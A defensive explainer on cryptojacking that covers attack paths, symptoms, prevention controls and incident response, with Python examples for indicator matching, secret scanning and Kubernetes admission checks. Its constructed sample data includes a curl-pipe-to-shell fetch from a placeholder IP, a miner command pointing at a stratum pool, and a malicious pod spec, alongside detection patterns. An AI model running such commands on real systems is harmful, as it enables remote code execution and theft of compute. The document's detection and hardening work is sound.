What Is Cryptojacking and How Can I Prevent It?

TL;DR

Cryptojacking is the unauthorized use of your computing power to mine cryptocurrency. Attackers inject miners via websites, browser extensions, malware, misconfigured cloud services (e.g., exposed Kubernetes/Docker), leaked keys, and weak auth. It quietly slows systems, inflates cloud bills, shortens device lifespans, and can be a smoke screen for deeper compromise. Major security agencies (CISA/NSA) and cloud providers (Google Cloud, AWS) have all issued guidance because a large share of compromised cloud instances are abused for mining. Protect yourself with least-privilege IAM, MFA, hardening Kubernetes/EKS, container image scanning, runtime policies, egress controls, WAF/IPS, ad/script blocking, patching, and continuous monitoring/alerts from tools like GuardDuty, SCC, and EDR. (CISA)


What exactly is cryptojacking?

Cryptojacking (sometimes called illicit cryptomining) happens when a malicious actor hijacks a device, browser, VM, container, or cluster to run cryptocurrency-mining software without the owner’s consent. Instead of stealing your data, they steal your CPU/GPU cycles and electricity. On the surface this may look “less harmful” than ransomware, but it drains performance, increases costs, and signals that an attacker is already inside your environment. Governments and vendors define it similarly: unauthorized use of computing resources to mine crypto. (CISA)


Why is cryptojacking so common?

  • It’s low risk / high reward for attackers. Mining is automated, payouts are pseudonymous, and infections can persist undetected for months.
  • Cloud scale makes it lucrative. Attackers love compromised cloud accounts, because elastic compute = elastic profit. In its November 2021 Threat Horizons report, Google's threat intelligence team found that 86% of the compromised Google Cloud instances it analyzed were used for cryptocurrency mining, frequently with the miner installed within seconds of compromise, which points to fully automated tooling. (Google)
  • Defenders often focus elsewhere. Teams prioritize ransomware and data theft; meanwhile weak credentials, leaked keys, and misconfigurations open the door to miners (exactly the pattern Google and CISA highlight). (Google Cloud)

How cryptojacking happens: the main attack paths

1) In-browser miners (drive-by or injected)

Attackers inject JavaScript into websites (via ad networks, CMS plug-ins, or XSS). When visitors open a page, their CPU spikes as the script mines in the background. This technique resurfaces periodically, especially on poorly secured sites and extensions. Guidance from security agencies categorizes these as resource-hijacking attacks that abuse client machines at scale. (CISA)

2) Malware on laptops and phones

Traditional malware installs miner binaries as a background service, sometimes with a watchdog that restarts if killed. Endpoint security products, EDR, and OS hardening are the countermeasures. (Fortinet)

3) Containers & Kubernetes clusters

Misconfigured Docker APIs, Kubernetes dashboards, exposed Argo Workflows, or permissive cluster roles are routinely exploited to drop miners. The NSA/CISA Kubernetes Hardening Guidance and analyses around it emphasize cryptomining as a prevalent abuse once clusters are compromised. (CISA)

4) Cloud VMs (IaaS)

Common entry points include leaked API keys, weak/no passwords, unpatched software, and default images. Google Cloud’s best-practices doc enumerates these and provides practical mitigations (MFA, secret hygiene, RBAC, network controls, monitoring). AWS publishes parallel detections and workflows in GuardDuty (with recent posts on evaluating findings and investigating EC2/EKS). (Google Cloud)

5) Third-party software or supply chain

Unvetted container images or compromised packages can ship miners. This affects on-prem and cloud alike—image signing, SBOMs, and scanning reduce risk. (Google Cloud)


What cryptojacking looks like (symptoms & indicators)

On endpoints (PCs/phones):

  • Fans spin up, CPU/GPU pegged even when idle; battery drains fast on laptops/phones.
  • Browser tabs consume unusual CPU; unknown extensions installed.
  • EDR or antivirus flags “coinminer” processes.

On servers/containers/cloud:

  • Sudden cost spikes (compute, egress, storage) or quota exhaustion.
  • New outbound connections to mining pools or suspicious DNS (GuardDuty surfaces these as CryptoCurrency:EC2/BitcoinTool.B!DNS and related finding types when an instance resolves or talks to cryptocurrency-associated domains and IPs).
  • Unusual process trees (e.g., xmrig, minerd, kdevtmpfsi), or shell scripts that fetch payloads via curl|bash. Miners are routinely renamed and run from /tmp or /dev/shm, so alert on the command line (stratum:// URLs, pool hosts and ports, wallet addresses) rather than on the process name alone.
  • DaemonSets you didn't deploy (the quickest way to land a miner on every node), or unexpected privileged pods in Kubernetes.
  • IAM anomalies (new keys, unusual regions), plus alerts from cloud-native detectors (Google SCC, AWS GuardDuty). (AWS re:Post)
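To make the indicators above concrete, here is an added example (not code from the original article, nor from any of the vendors it cites) that runs constructed process-table, DNS-query and connection records through simple indicator matching. The process names, stratum ports and pool-domain hints are illustrative assumptions to be replaced by your own threat intelligence; the sample records are constructed for the example and use TEST-NET addresses.

```python
"""Added example: match constructed host telemetry against cryptojacking indicators."""
import re
from dataclasses import dataclass

# Process names from well-known cryptojacking campaigns (the article names xmrig,
# minerd and kdevtmpfsi; kinsing is the loader that drops kdevtmpfsi).
MINER_PROCESS_NAMES = {"xmrig", "minerd", "kdevtmpfsi", "kinsing"}

# Command-line fragments that survive a renamed binary: stratum URLs, pool flags
# and the curl|bash dropper pattern.
MINER_CMDLINE_PATTERNS = [
    re.compile(r"stratum\+(?:tcp|ssl)://", re.I),
    re.compile(r"(?:^|\s)(?:-o|--url)\s+\S+:\d{4,5}", re.I),
    re.compile(r"--donate-level", re.I),
    re.compile(r"(?:curl|wget)\s+[^|]*\|\s*(?:ba)?sh", re.I),
]

# Illustrative assumptions: substrings of public pool hostnames and ports that
# stratum endpoints commonly listen on. "pool" will also hit names like "spool";
# in production drive this from a curated domain feed instead.
POOL_DOMAIN_HINTS = ("pool", "xmr", "monero", "nanopool", "supportxmr", "minexmr", "hashvault")
STRATUM_PORTS = {3333, 4444, 5555, 7777, 8888, 14433, 14444, 45700}


@dataclass(frozen=True)
class Finding:
    source: str     # "process", "dns" or "conn"
    indicator: str  # which rule fired
    evidence: str   # the raw record


def scan_processes(ps_lines):
    """ps_lines: rows shaped like `ps -eo pid,user,comm,args --no-headers`."""
    findings = []
    for line in ps_lines:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        _pid, _user, comm, args = parts
        if comm.lower() in MINER_PROCESS_NAMES:
            findings.append(Finding("process", f"known miner name: {comm}", line))
            continue
        for pat in MINER_CMDLINE_PATTERNS:
            if pat.search(args):
                findings.append(Finding("process", f"cmdline matches {pat.pattern}", line))
                break
    return findings


def scan_dns(dns_lines):
    """dns_lines: '<timestamp> <client-ip> <qname>' rows, a simplification of
    resolver query logs (Cloud DNS logging, Route 53 Resolver query logging)."""
    findings = []
    for line in dns_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        qname = parts[2].rstrip(".").lower()
        hits = [h for h in POOL_DOMAIN_HINTS if h in qname]
        if hits:
            findings.append(Finding("dns", f"pool-like domain ({', '.join(hits)}): {qname}", line))
    return findings


def scan_connections(conn_lines):
    """conn_lines: '<proto> <src:port> <dst:port> <state>' rows (`ss -tn`-like)."""
    findings = []
    for line in conn_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        dst = parts[2]
        try:
            dport = int(dst.rsplit(":", 1)[1])
        except (IndexError, ValueError):
            continue
        if dport in STRATUM_PORTS:
            findings.append(Finding("conn", f"stratum-like destination port {dport}: {dst}", line))
    return findings


# Constructed sample telemetry (TEST-NET addresses, .invalid hostnames).
SAMPLE_PS = [
    "1 root systemd /sbin/init",
    "842 www-data kdevtmpfsi /tmp/kdevtmpfsi",
    "913 app node /usr/bin/node server.js",
    "1022 root ld-linux-x86-64 /dev/shm/.x/ld -o stratum+tcp://pool.example.invalid:4444 -u 4AconstructedWallet",
    "1100 root sh sh -c 'curl -fsSL http://198.51.100.7/i.sh | bash'",
]
SAMPLE_DNS = [
    "2024-05-01T10:00:01Z 10.0.3.14 api.github.com.",
    "2024-05-01T10:00:02Z 10.0.3.14 pool.supportxmr.com.",
    "2024-05-01T10:00:04Z 10.0.3.22 xmr-eu1.nanopool.org.",
]
SAMPLE_CONN = [
    "tcp 10.0.3.14:51522 203.0.113.9:4444 ESTAB",
    "tcp 10.0.3.14:51530 198.51.100.20:443 ESTAB",
]

if __name__ == "__main__":
    for f in scan_processes(SAMPLE_PS) + scan_dns(SAMPLE_DNS) + scan_connections(SAMPLE_CONN):
        print(f"[{f.source}] {f.indicator}\n    {f.evidence}")
```

Note that the renamed miner (`ld-linux-x86-64` running out of `/dev/shm`) is caught only by its command line; a rule keyed on process names alone would have missed it, which is why the command-line patterns matter more than the name list.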

Real-world scale and impact

  • Cloud compromises skew heavily to mining: Google observed that 86% of the compromised Google Cloud instances it studied were used for cryptomining, and in 58% of those cases the mining software was downloaded within 22 seconds of compromise, illustrating attacker automation and why rapid, automated detection matters. (Google)
  • Kubernetes is a frequent target: Multiple advisories—CISA/NSA and vendor research—call out miners abusing cluster compute. Hardening guidance aims to prevent exactly this. (CISA)

The risks go beyond your electric bill

  1. Operational degradation: Production latency, outages, and missed SLOs due to resource starvation.
  2. Financial loss: Direct energy/compute costs and potential cloud overage bills.
  3. Security blind spots: Cryptojacking can mask lateral movement; if an attacker installed a miner, they might also exfiltrate secrets or prep for ransomware.
  4. Compliance & reputation: Data exposure risks increase once hosts are compromised—even if the initial goal was “just” mining. Agencies emphasize treating cryptomining as an incident that warrants full scoping and containment. (CISA)

How to prevent cryptojacking (individuals)

  1. Harden your browser
    • Use a reputable ad/tracker/script blocker and turn on your browser's built-in cryptominer blocking where it exists (Firefox's Enhanced Tracking Protection has a dedicated cryptominer category).
    • Avoid sideloading extensions; review existing extensions for abuse.
  2. Keep systems up to date
    • Patch OS, browsers, and plug-ins quickly. Miner droppers frequently ride on exploit kits that target unpatched browsers, and the sites that serve in-browser miners are usually themselves compromised through unpatched web software.
  3. Install endpoint protection
    • Enable built-in protections and add an EDR/antivirus that detects miner binaries and suspicious behaviors.
  4. Use strong authentication everywhere
    • MFA on email, cloud storage, GitHub, and exchange/wallet accounts to prevent account takeovers that may be repurposed for mining infra. Agencies and cloud providers repeatedly stress MFA and strong auth. (Google Cloud)
  5. Practice secret hygiene
    • Do not store API keys or private keys in plaintext; use password managers, hardware keys, and encrypted vaults.
  6. Monitor device performance
    • Unexpected heat, noise, or battery drain? Check Task Manager/Activity Monitor for unknown CPU-hungry processes.

How to prevent cryptojacking (organizations & teams)

Below is a practical, prioritized checklist blending guidance from CISA/NSA and major cloud providers.

A) Identity, access, and secrets

  • Enforce MFA for every human cloud console user, preferring phishing-resistant methods (FIDO2/WebAuthn). Service accounts cannot use MFA, so give them short-lived credentials (workload identity federation, IAM roles) instead of long-lived keys.
  • Least privilege IAM: grant only what's required; rotate keys, and give humans federated SSO sessions instead of long-lived access keys.
  • Secrets management: move API keys, tokens, and credentials to a managed secrets store (e.g., cloud KMS/Secrets Manager); scan repos for leaked keys and set org-wide pre-commit hooks. Google’s best practices explicitly call out leaked credentials as a major vector. (Google Cloud)
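Here is an added example of the kind of pre-commit scan the bullet above describes; it is not code from Google's best-practices document or from any scanning product. It checks staged file contents for well-known credential formats (AWS access key IDs, Google API keys, GitHub tokens, PEM private-key headers, GCP service-account JSON) and for high-entropy values assigned to secret-looking variables. The staged files are constructed for the example (the access key ID is AWS's documented example value), and the entropy threshold and placeholder list are tuning assumptions.

```python
"""Added example: a pre-commit style scan for leaked credentials in staged files."""
import math
import re

# Well-known credential shapes. AKIA/ASIA + 16 chars is the AWS access key ID
# format; AIza + 35 chars is a Google API key; ghp_/gho_/ghu_/ghs_/ghr_ + 36 is a
# classic GitHub token.
KNOWN_FORMATS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----"),
    "gcp_service_account_json": re.compile(r'"type"\s*:\s*"service_account"'),
}

# Generic catch: a secret-looking variable assigned a long token. Confirmed with
# Shannon entropy so prose like PASSWORD="see the vault" is not flagged.
GENERIC_ASSIGNMENT = re.compile(
    r"(?i)(?:secret|token|passwd|password|api[_-]?key)[A-Za-z0-9_]*\s*[:=]\s*['\"]?"
    r"([A-Za-z0-9/+_\-=]{16,})"
)
ENTROPY_THRESHOLD = 3.5  # bits per character; tuning assumption
PLACEHOLDER_WORDS = ("changeme", "example", "placeholder", "xxxx", "your-")


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for a single repeated character)."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_text(path, text):
    """Return (path, line_no, rule, snippet) for each suspected secret in text."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in KNOWN_FORMATS.items():
            if pattern.search(line):
                findings.append((path, line_no, rule, line.strip()[:80]))
        for m in GENERIC_ASSIGNMENT.finditer(line):
            value = m.group(1)
            if any(w in value.lower() for w in PLACEHOLDER_WORDS):
                continue  # obvious placeholder, not a real credential
            if shannon_entropy(value) >= ENTROPY_THRESHOLD:
                findings.append((path, line_no, "high_entropy_secret", line.strip()[:80]))
    return findings


def scan_staged(files):
    """files: {path: content}, as a hook would read them from `git diff --cached`."""
    findings = []
    for path, content in files.items():
        findings.extend(scan_text(path, content))
    return findings


def should_block_commit(files):
    return len(scan_staged(files)) > 0


# Constructed staged files for the example.
STAGED = {
    "config/prod.env": (
        "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
        "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYzQ9mT2vLp8\n"
    ),
    "deploy/sa.json": (
        '{"type": "service_account", "project_id": "demo-project", '
        '"private_key": "-----BEGIN PRIVATE KEY-----\\nREDACTED\\n-----END PRIVATE KEY-----"}\n'
    ),
    "README.md": "Set API_KEY=<your-key-here> before running the service.\n",
    "app/settings.py": (
        'DB_PASSWORD = "changeme-before-deploying"\n'
        'SESSION_SECRET = "q9Zp3kLmN8xRt2Vw7Yb4Hc6Jd1Fg5Sa0"\n'
    ),
}

if __name__ == "__main__":
    for path, line_no, rule, snippet in scan_staged(STAGED):
        print(f"{path}:{line_no} [{rule}] {snippet}")
    raise SystemExit(1 if should_block_commit(STAGED) else 0)
```

Wired in as a pre-commit hook, a non-zero exit blocks the commit. The README placeholder and the `changeme` password pass, while the AWS key pair, the service-account file and the random session secret are all caught; pair this with a scan of the full history, because a secret that was committed once is already leaked even if it is removed in a later commit.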

B) Cloud & VM hardening

  • Baseline images and CIS-hardened OS builds; remove compilers and unnecessary tools.
  • Network egress control: deny-by-default outbound rules; explicitly block known mining pools, stratum ports, and newly registered or uncategorized domains at the DNS and firewall layers.
  • Continuous posture management (CSPM): detect exposed services, weak SSH, open storage buckets.
  • Auto-remediation: when a VM matches a miner IOC, isolate via tags/security groups and attach a forensics workflow.

C) Containers & Kubernetes

  • Follow NSA/CISA Kubernetes Hardening:
    • Disable anonymous auth, use RBAC properly, lock down etcd, enforce network policies, and restrict pod security/privileged capabilities.
    • Scan images for malware and miners; sign images and verify signatures at admission; enforce a read-only root filesystem; drop CAP_NET_RAW.
    • Monitor for DaemonSets you didn’t deploy and anomalous CPU usage across nodes. (CISA)
  • Lock down Docker: never expose the Docker daemon's TCP socket (2375/2376) to the internet; if remote access is unavoidable, require mutual TLS; apply resource limits so a single container can't starve a node.

D) Detection, monitoring, and response

  • Cloud-native detectors:
    • Google Cloud Security Command Center (SCC) has cryptomining protection and response programs for customers, plus prescriptive “best practices” for preventing such attacks. (Google Cloud)
    • AWS GuardDuty detects EC2/EKS cryptomining behaviors and suspicious DNS; AWS has current blogs on testing detections and investigating findings with Detective. (Amazon Web Services, Inc.)
  • Set actionable alerts on:
    • CPU anomalies, unexpected egress, new outbound domains to mining pools, creation of unexpected IAM users/keys, and sudden spending spikes.
  • Integrate EDR/XDR: ensure miner families (e.g., XMRig) map to alerting rules; watch for shell pipelines that fetch binaries.
  • Cost guardrails: budget alerts and spend limits to catch sudden compute bursts.

E) Web & email security

  • WAF and RASP to stop web-app injections that lead to in-browser miners.
  • Email security and sandboxing to prevent miner droppers from phishing.

F) Governance, training, and incident process

  • Run tabletop exercises: simulate “mining detected in prod” and practice isolation + forensics.
  • Asset ownership: every cluster/VM has a named owner; ghost workloads get culled.
  • Developer enablement: teach engineers how to store secrets, sign images, and read GuardDuty/SCC alerts.

Step-by-step response if you suspect cryptojacking

  1. Contain
    • Isolate the host/VM/pod from the network. In cloud, detach it from load balancers and move it into a quarantine security group that permits only your forensics access; in Kubernetes, cordon the node so nothing new lands on it. Hold off on draining until evidence is collected, and remember that draining does not remove DaemonSet-managed pods, which is exactly how many cluster-wide miners are deployed.
    • If Kubernetes, delete the malicious DaemonSets/Deployments themselves (deleting only the pods lets the controller recreate them), rotate service account tokens, and revoke any suspicious ClusterRoleBindings and RoleBindings.
  2. Preserve evidence
    • Snapshot disks, collect memory (where feasible), export logs (Cloud Logging/CloudTrail/CloudWatch), and save suspicious binaries/URLs.
  3. Eradicate
    • Kill miner processes, rebuild from clean images (don’t just stop the process), rotate credentials, and patch exploited vulnerabilities.
  4. Recover & harden
    • Reintroduce hosts with hardened configs, tighter egress rules, admission controls, and monitor closely for re-infection.
  5. Report & review
    • Notify stakeholders; if the incident involved potential data exposure, follow legal/regulatory steps; document lessons learned and update baselines. Agencies recommend treating cryptomining as a serious indicator of compromise that merits full IR. (CISA)

Special focus: Kubernetes/EKS/containers

Because containers make it easy to run lightweight miners everywhere, clusters are a prime target. The NSA/CISA guidance and vendor blogs outline high-value basics you should bake in by default:

  • Disable anonymous access; require strong auth to the API server; RBAC least privilege.
  • Encrypt etcd and restrict access; audit logs on.
  • NetworkPolicies to restrict pod egress; block mining pools and unexpected DNS.
  • Admission control: only allow signed, scanned images; deny privileged pods and hostPath mounts unless approved.
  • Resource limits & quotas so a rogue pod can’t monopolize CPU/GPU.
  • Runtime security to detect suspicious processes (e.g., XMRig), curl | bash patterns, and outbound beaconing. (CISA)
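The admission-control bullets above, as an added example rather than a policy taken from the NSA/CISA guidance or from any admission controller's own code: a Python function that evaluates a Pod object the way a validating webhook would, and a wrapper that turns the result into an AdmissionReview response. The trusted registry and the two sample Pods are constructed for the example; in production you would express the same checks as Pod Security Admission, Kyverno or Gatekeeper policies rather than hand-rolled code.

```python
"""Added example: validating-webhook style checks for a Pod manifest."""

# Assumption for the example: only this internal registry is trusted.
ALLOWED_REGISTRIES = ("registry.example.internal/",)


def check_pod(pod):
    """Return the policy violations for a v1 Pod object (empty list if acceptable)."""
    violations = []
    spec = pod.get("spec", {})

    # Host namespaces and hostPath give a miner the whole node and hide it from pod-scoped monitoring.
    for flag in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(flag):
            violations.append(f"{flag} is not allowed")
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            violations.append(f"volume {vol.get('name', '?')}: hostPath mounts are not allowed")

    for c in spec.get("initContainers", []) + spec.get("containers", []):
        name = c.get("name", "?")
        image = c.get("image", "")
        sc = c.get("securityContext", {})
        limits = c.get("resources", {}).get("limits", {})

        # Provenance: trusted registry and immutable digest, so a tag cannot be repointed at a miner.
        if not image.startswith(ALLOWED_REGISTRIES):
            violations.append(f"{name}: image {image!r} is not from an allowed registry")
        if "@sha256:" not in image:
            violations.append(f"{name}: image must be pinned by digest")

        # Privilege: no privileged mode, no escalation, read-only root FS, no raw sockets.
        if sc.get("privileged"):
            violations.append(f"{name}: privileged containers are not allowed")
        if sc.get("allowPrivilegeEscalation") is not False:
            violations.append(f"{name}: allowPrivilegeEscalation must be set to false")
        if sc.get("readOnlyRootFilesystem") is not True:
            violations.append(f"{name}: readOnlyRootFilesystem must be true")
        dropped = set(sc.get("capabilities", {}).get("drop", []))
        if not dropped & {"ALL", "NET_RAW"}:
            violations.append(f"{name}: capabilities must drop NET_RAW (or ALL)")

        # Resource ceilings: a container without limits can monopolize a node's CPU.
        for resource in ("cpu", "memory"):
            if resource not in limits:
                violations.append(f"{name}: missing resources.limits.{resource}")
    return violations


def admission_response(review):
    """Build the AdmissionReview response for a v1 AdmissionReview request."""
    request = review["request"]
    violations = check_pod(request["object"])
    response = {"uid": request["uid"], "allowed": not violations}
    if violations:
        response["status"] = {"code": 403, "message": "; ".join(violations)}
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview", "response": response}


def make_review(pod, uid="00000000-0000-4000-8000-000000000001"):
    """Wrap a Pod in the request shape the API server sends to a webhook (constructed)."""
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview",
            "request": {"uid": uid, "operation": "CREATE",
                        "kind": {"group": "", "version": "v1", "kind": "Pod"}, "object": pod}}


DIGEST = "sha256:" + "0123456789abcdef" * 4  # constructed placeholder digest

# Constructed: a typical miner delivery pod (host access, privileged, mutable tag, no limits).
MINER_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "kube-proxy-helper", "namespace": "kube-system"},
    "spec": {
        "hostNetwork": True, "hostPID": True,
        "volumes": [{"name": "rootfs", "hostPath": {"path": "/"}}],
        "containers": [{
            "name": "helper", "image": "docker.io/library/alpine:latest",
            "command": ["sh", "-c", "curl -fsSL http://198.51.100.7/i.sh | sh"],
            "securityContext": {"privileged": True},
            "volumeMounts": [{"name": "rootfs", "mountPath": "/host"}],
        }],
    },
}
# Constructed: a workload that satisfies every check.
COMPLIANT_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "payments-api", "namespace": "payments"},
    "spec": {"containers": [{
        "name": "api", "image": "registry.example.internal/payments/api@" + DIGEST,
        "securityContext": {"runAsNonRoot": True, "allowPrivilegeEscalation": False,
                            "readOnlyRootFilesystem": True, "capabilities": {"drop": ["ALL"]}},
        "resources": {"limits": {"cpu": "500m", "memory": "256Mi"}},
    }]},
}

if __name__ == "__main__":
    for pod in (MINER_POD, COMPLIANT_POD):
        print(pod["metadata"]["name"], admission_response(make_review(pod))["response"])
```

The miner pod trips eleven separate rules, which is the point: a workload that needs the host's network and PID namespace, a writable root filesystem, a mutable tag from a public registry and no CPU ceiling has no business being admitted, and each of those properties is also what lets a miner spread and stay hidden.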

Economics and motivations for attackers (and why this won’t disappear)

  • Predictable revenue: Mining on stolen compute is profitable even at modest coin prices when energy is “free.”
  • Automation at scale: As Google observed, automated toolchains deploy miners within seconds of compromise. That speed beats many manual IR processes, which is why automated controls (admission policies, egress blocks, budget alerts) are crucial. (Google)
  • Low visibility: Many organizations don’t alert on CPU anomalies or outbound DNS categories, giving miners a long dwell time.
  • Reusable foothold: The same access used for mining can be repurposed for lateral movement and data theft later.

Quick cheatsheet: 25+ concrete controls to stop cryptojacking

Identity & Secrets

  1. MFA everywhere (prefer phishing-resistant methods).
  2. Rotate keys; remove long-lived access keys; enforce least-privilege IAM.
  3. Managed secrets (KMS/Secrets Manager); repo scanning + commit hooks.

Network
4. Default-deny egress; allowlist only what you need.
5. Block mining pool domains/categories at DNS and firewall layers.
6. Egress alerts on new, high-entropy domains and unusual ports.

Compute & OS
7. CIS-hardened images; disable unused services/tools (curl/wget where possible).
8. System resource quotas; GPU scheduling controls.
9. EDR/XDR with miner signatures + behavior rules.

Containers & K8s
10. Admission control enforcing signed, scanned images.
11. Pod Security Admission, Kyverno, or OPA Gatekeeper policies (no privilege escalation; drop CAP_NET_RAW; read-only root FS).
12. NetworkPolicies for pod egress; per-namespace quotas.
13. Monitor for DaemonSets and sudden CPU surges across nodes.
14. Disable anonymous auth; restrict etcd; enable audit logging.

Cloud posture
15. CSPM to catch exposed services and weak SSH.
16. Budget alerts and spend caps; anomaly detection on usage.
17. SCC/GuardDuty enabled with auto-response playbooks.
18. VPC Flow Logs / Cloud DNS logs feeding detection pipelines.

Web & Email
19. WAF with managed rules; DDoS/IPS protection.
20. Email gateway + sandbox; DMARC/DKIM/SPF alignment.

Browser & Endpoints
21. Script/ad blocking; extension allowlists.
22. OS & browser auto-update.
23. Encrypted DNS (with security filtering) for consumer devices.

Operations
24. Tabletop exercises for “mining in prod” scenarios.
25. Golden images and immutability: rebuild, don’t patch in place.
26. Clear ownership for every cluster/VM; decommission or quarantine unknowns.

(Controls above synthesize CISA/NSA guidance and cloud best practices.) (CISA)


Frequently asked questions

Is cryptojacking illegal?
Yes—unauthorized use of someone else’s compute is illicit in most jurisdictions and often violates anti-hacking statutes and cloud provider terms. Treat it as an incident and follow your legal/compliance process. (For official guidance, see national cyber agencies such as CISA.) (CISA)

Which coins are most common?
Miners usually target Monero (XMR): its RandomX proof-of-work is designed to run on general-purpose CPUs, which is exactly what hijacked servers and browsers offer, and its transactions are far harder to trace than Bitcoin's. (The specific coin can vary; the defense doesn't change.)

Can a browser tab really cause high bills?
A single tab won’t spike cloud bills, but on endpoints it drains batteries, overheats, and slows work. In enterprise fleets, widespread drive-by mining can degrade productivity and mask broader compromise. (CISA)

Why do cloud incidents skew to mining instead of data theft?
Because mining is easy to monetize instantly. Google Cloud’s study shows the bias toward miners among compromised instances, and also found many compromises stemmed from weak auth, leaked keys, and misconfigs—all quickly exploited by automated bots. Fix the basics first. (Google)


Recommended references & further reading

  • CISA: “Defending Against Illicit Cryptocurrency Mining Activity” – baseline definitions, risks, and mitigations. (CISA)
  • Google Cloud (Threat Horizons, Nov 2021): 86% of analyzed compromised Cloud instances used for mining; details on initial access and speed to miner install. (Google)
  • Google Cloud Architecture: “Best practices for protecting against cryptocurrency mining attacks” – hands-on controls for identities, secrets, and networks in GCP. (Google Cloud)
  • NSA/CISA: “Kubernetes Hardening Guidance” – configuration baselines to prevent cluster abuse, including cryptomining. (CISA)
  • AWS: GuardDuty cryptomining detections; posts on testing detections and investigating with Detective (EC2/EKS). (Amazon Web Services, Inc.)

Bottom line

Cryptojacking is not benign—it is a security incident and a financial drain that often indicates a broader compromise. The good news: most successful attacks exploit basic gaps (weak auth, leaked keys, exposed services, unscanned images). Close those gaps with the controls and playbooks above, and back them with continuous monitoring and automatic response from your cloud and endpoint security stack. If you do one thing today: turn on MFA everywhere, audit your cloud for exposed services, and enable cryptomining detections (GuardDuty/SCC/EDR). It’s the fastest path to shrinking this threat. (Google Cloud)
